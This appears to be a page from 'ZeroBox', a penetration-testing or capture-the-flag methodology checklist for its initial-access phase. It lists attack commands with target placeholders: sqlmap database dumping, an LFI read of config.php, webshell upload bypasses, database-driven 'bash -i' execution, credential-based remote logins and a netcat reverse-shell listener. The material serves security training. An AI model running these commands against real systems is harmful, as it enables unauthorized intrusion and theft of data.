ZeroBox

Phase 04: Foothold Execution & Initial Access

Deliver initial exploit payload, bypass security controls, and obtain a reliable remote command execution or reverse shell. This phase has 5 checklist items. Placeholders such as {TARGET_IP} are values for your target.

Exploit Delivery & Reverse Shell Execution

Branch A: Web Injections (SQLi, SSTI, LFI Wrappers, Cmd Injection)

Exploit input validation flaws to retrieve database tables or read source code.

sqlmap -u "http://{TARGET_IP}/view?id=1" --batch --dbs or curl -s "http://{TARGET_IP}/?page=php://filter/convert.base64-encode/resource=config.php"

Branch A: File Upload Filter Bypass (Webshell Delivery)

Bypass file upload restrictions to write interactive webshell to webroot.

Upload .phtml, .php5, .phar, double extension or Content-Type spoofing

Branch D: Out-of-Band Command Execution via Database

Leverage database administrative privileges to execute system commands.

EXEC xp_cmdshell 'powershell ...' or COPY table FROM PROGRAM 'bash -i ...'

Branch C: Credential Validation & Remote Shell Connect

Establish authenticated command session using discovered credentials or SSH keys.

ssh -i id_rsa user@{TARGET_IP} or evil-winrm -i {TARGET_IP} -u {USER} -p "{PASSWORD}"

Listener Setup & Reverse Shell Catch

Prepare attacker listener and trigger reverse TCP socket callback.

nc -lvnp {LPORT}

All phases

  1. Host Discovery & Surface Mapping
  2. Protocol & Service Enumeration
  3. Vulnerability Identification & Threat Modeling
  4. Foothold Execution & Initial Access
  5. Shell Stabilization & Context Triage
  6. Internal System & Network Reconnaissance
  7. Privilege Escalation & Lateral Movement
  8. Post-Exploitation, Flag Vault & Artifact Collection

Tick items off per machine. ZeroBox tracks checklist progress for every target. Open the methodology checklist